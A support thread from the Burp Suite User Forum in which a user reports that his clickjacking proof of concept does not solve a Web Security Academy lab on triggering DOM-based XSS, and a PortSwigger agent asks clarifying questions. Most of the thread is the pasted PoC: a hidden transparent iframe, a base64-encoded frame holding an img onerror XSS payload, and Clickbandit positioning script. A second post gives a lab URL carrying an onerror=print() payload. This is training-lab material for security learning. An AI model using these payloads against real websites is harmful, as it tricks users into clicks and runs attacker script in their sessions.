Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab: Exploiting clickjacking vulnerability to trigger DOM-based XSS does not work correctly

Александр | Last updated: Mar 17, 2023 07:07PM UTC

Hi! A correct POC (generated by Burp Clickbandit, tested in Chromium Version 111.0.5563.64 (Official Build) (arm64)) does not solve the lab. https://portswigger.net/web-security/clickjacking/lab-exploiting-to-trigger-dom-based-xss

Ben, PortSwigger Agent | Last updated: Mar 21, 2023 07:47AM UTC

Hi, Are you able to supply us with the details of your POC?

Александр | Last updated: Mar 23, 2023 04:25PM UTC

Sorry for the delay. The code: <div id="container" style="clip-path: inset(200px 360px 233px 200px); clip: rect(200px, 360px, 233px, 200px); overflow: hidden; position: absolute; left: 0px; top: 0px; width: 100%; height: 100%;"> <!-- Clickjacking PoC Generated by Burp Suite Professional --> <input id="clickjack_focus" style="opacity:0;position:absolute;left:-5000px;"> <div id="clickjack_button" style="opacity: 1; transform-style: preserve-3d; text-align: center; font-family: Arial; font-size: 100%; width: 160px; height: 33px; z-index: 0; background-color: red; color: rgb(255, 255, 255); position: absolute; left: 200px; top: 200px;"><div style="position:relative;top: 50%;transform: translateY(-50%);">Click</div></div> <!-- Show this element when clickjacking is complete --> <div id="clickjack_complete" style="display:none;-webkit-transform-style: preserve-3d;-moz-transform-style: preserve-3d;transform-style: preserve-3d;font-family:Arial;font-size:16pt;color:red;text-align:center;width:100%;height:100%;"><div style="position:relative;top: 50%;transform: translateY(-50%);">You've been clickjacked!</div></div> <iframe id="parentFrame" src="data:text/html;base64,PHNjcmlwdD53aW5kb3cuYWRkRXZlbnRMaXN0ZW5lcigibWVzc2FnZSIsIGZ1bmN0aW9uKGUpeyB2YXIgZGF0YSwgY2hpbGRGcmFtZSA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJjaGlsZEZyYW1lIik7IHRyeSB7IGRhdGEgPSBKU09OLnBhcnNlKGUuZGF0YSk7IH0gY2F0Y2goZSl7IGRhdGEgPSB7fTsgfSBpZighZGF0YS5jbGlja2JhbmRpdCl7IHJldHVybiBmYWxzZTsgfSBjaGlsZEZyYW1lLnN0eWxlLndpZHRoID0gZGF0YS5kb2NXaWR0aCsicHgiO2NoaWxkRnJhbWUuc3R5bGUuaGVpZ2h0ID0gZGF0YS5kb2NIZWlnaHQrInB4IjtjaGlsZEZyYW1lLnN0eWxlLmxlZnQgPSBkYXRhLmxlZnQrInB4IjtjaGlsZEZyYW1lLnN0eWxlLnRvcCA9IGRhdGEudG9wKyJweCI7fSwgZmFsc2UpOzwvc2NyaXB0PjxpZnJhbWUgc3JjPSJodHRwczovLzBhNmMwMGM1MDMzNjE3YThjMmI5NTNiYTAwMjAwMGUxLndlYi1zZWN1cml0eS1hY2FkZW15Lm5ldC9mZWVkYmFjaz9uYW1lPSYjMzc7M0NpbWcmIzM3OzIwc3JjPTEmIzM3OzIwb25lcnJvcj1hbGVydCYjNDA7MSYjNDE7JiMzNzszRSYjMzg7ZW1haWw9dGVzdCYjNjQ7dGVzdC5jb20mIzM4O3N1YmplY3Q9MSYjMzg7bWVzc2FnZT0xIiBzY3JvbGxpbmc9Im5vIiBzdHlsZT0id2lkdGg6MTQ0MHB4O2hlaWdodDo5MjNweDtwb3NpdGlvbjphYnNvbHV0ZTtsZWZ0OjUwcHg7dG9wOi02MjNweDtib3JkZXI6MDsiIGZyYW1lYm9yZGVyPSIwIiBpZD0iY2hpbGRGcmFtZSIgb25sb2FkPSJwYXJlbnQucG9zdE1lc3NhZ2UoSlNPTi5zdHJpbmdpZnkoe2NsaWNrYmFuZGl0OjF9KSwnKicpIj48L2lmcmFtZT4=" frameborder="0" scrolling="no" style="transform: scale(1); transform-origin: 200px 200px; opacity: 0.0001; border: 0px; position: absolute; z-index: 1; width: 1440px; height: 923px; left: 0px; top: 0px;"></iframe> </div> <script>function findPos(obj) { var left = 0, top = 0; if(obj.offsetParent) { while(1) { left += obj.offsetLeft; top += obj.offsetTop; if(!obj.offsetParent) { break; } obj = obj.offsetParent; } } else if(obj.x && obj.y) { left += obj.x; top += obj.y; } return [left,top]; }function generateClickArea(pos) { var elementWidth, elementHeight, x, y, parentFrame = document.getElementById('parentFrame'), desiredX = 200, desiredY = 200, parentOffsetWidth, parentOffsetHeight, docWidth, docHeight, btn = document.getElementById('clickjack_button'); if(pos < window.clickbandit.config.clickTracking.length) { clickjackCompleted(false); elementWidth = window.clickbandit.config.clickTracking[pos].width; elementHeight = window.clickbandit.config.clickTracking[pos].height; btn.style.width = elementWidth + 'px'; btn.style.height = elementHeight + 'px'; window.clickbandit.elementWidth = elementWidth; window.clickbandit.elementHeight = elementHeight; x = window.clickbandit.config.clickTracking[pos].left; y = window.clickbandit.config.clickTracking[pos].top; docWidth = window.clickbandit.config.clickTracking[pos].documentWidth; docHeight = window.clickbandit.config.clickTracking[pos].documentHeight; parentOffsetWidth = desiredX - x; parentOffsetHeight = desiredY - y; parentFrame.style.width = docWidth+'px'; parentFrame.style.height = docHeight+'px'; parentFrame.contentWindow.postMessage(JSON.stringify({clickbandit: 1, docWidth: docWidth, docHeight: docHeight, left: parentOffsetWidth, top: parentOffsetHeight}),'*'); calculateButtonSize(getFactor(parentFrame)); showButton(); if(parentFrame.style.opacity === '0') { calculateClip(); } } else { resetClip(); hideButton(); clickjackCompleted(true); } }function hideButton() { var btn = document.getElementById('clickjack_button'); btn.style.opacity = 0; }function showButton() { var btn = document.getElementById('clickjack_button'); btn.style.opacity = 1; }function clickjackCompleted(show) { var complete = document.getElementById('clickjack_complete'); if(show) { complete.style.display = 'block'; } else { complete.style.display = 'none'; } }window.addEventListener("message", function handleMessages(e){ var data; try { data = JSON.parse(e.data); } catch(e){ data = {}; } if(!data.clickbandit) { return false; } showButton(); },false);window.addEventListener("blur", function(){ if(window.clickbandit.mouseover) { hideButton();setTimeout(function(){ generateClickArea(++window.clickbandit.config.currentPosition);document.getElementById("clickjack_focus").focus();},1000); } }, false);document.getElementById("parentFrame").addEventListener("mouseover",function(){ window.clickbandit.mouseover = true; }, false);document.getElementById("parentFrame").addEventListener("mouseout",function(){ window.clickbandit.mouseover = false; }, false);</script><script>window.clickbandit={mode: "review", mouseover:false,elementWidth:160,elementHeight:33,config:{"clickTracking":[{"width":160,"height":33,"mouseX":220,"mouseY":836,"left":150,"top":823,"documentWidth":1440,"documentHeight":923}],"currentPosition":0}};function calculateClip() { var btn = document.getElementById('clickjack_button'), w = btn.offsetWidth, h = btn.offsetHeight, container = document.getElementById('container'), x = btn.offsetLeft, y = btn.offsetTop; container.style.overflow = 'hidden'; container.style.clip = 'rect('+y+'px, '+(x+w)+'px, '+(y+h)+'px, '+x+'px)'; container.style.clipPath = 'inset('+y+'px '+(x+w)+'px '+(y+h)+'px '+x+'px)'; }function calculateButtonSize(factor) { var btn = document.getElementById('clickjack_button'), resizedWidth = Math.round(window.clickbandit.elementWidth * factor), resizedHeight = Math.round(window.clickbandit.elementHeight * factor); btn.style.width = resizedWidth + 'px'; btn.style.height = resizedHeight + 'px'; if(factor > 100) { btn.style.fontSize = '400%'; } else { btn.style.fontSize = (factor * 100) + '%'; } }function resetClip() { var container = document.getElementById('container'); container.style.overflow = 'visible'; container.style.clip = 'auto'; container.style.clipPath = 'none'; }function getFactor(obj) { if(typeof obj.style.transform === 'string') { return obj.style.transform.replace(/[^\d.]/g,''); } if(typeof obj.style.msTransform === 'string') { return obj.style.msTransform.replace(/[^\d.]/g,''); } if(typeof obj.style.MozTransform === 'string') { return obj.style.MozTransform.replace(/[^\d.]/g,''); } if(typeof obj.style.oTransform === 'string') { return obj.style.oTransform.replace(/[^\d.]/g,''); } if(typeof obj.style.webkitTransform === 'string') { return obj.style.webkitTransform.replace(/[^\d.]/g,''); } return 1; }</script>

Ben, PortSwigger Agent | Last updated: Mar 24, 2023 11:09AM UTC

Hi Alexander, Just to clarify a couple of things, does your exploit have a div element located over the underlying 'Submit Feedback' button that is called 'Click me'? And does your exploit trigger the print() function?

Александр | Last updated: Mar 24, 2023 10:10PM UTC

Hi, I use the following url: https://0ab10050033828c4c0cb7cbd00c500a3.web-security-academy.net/feedback?name=%3Cimg%20src=1%20onerror=print()%3E&email=test@test&subject=1&message=1

Ben, PortSwigger Agent | Last updated: Mar 28, 2023 12:36PM UTC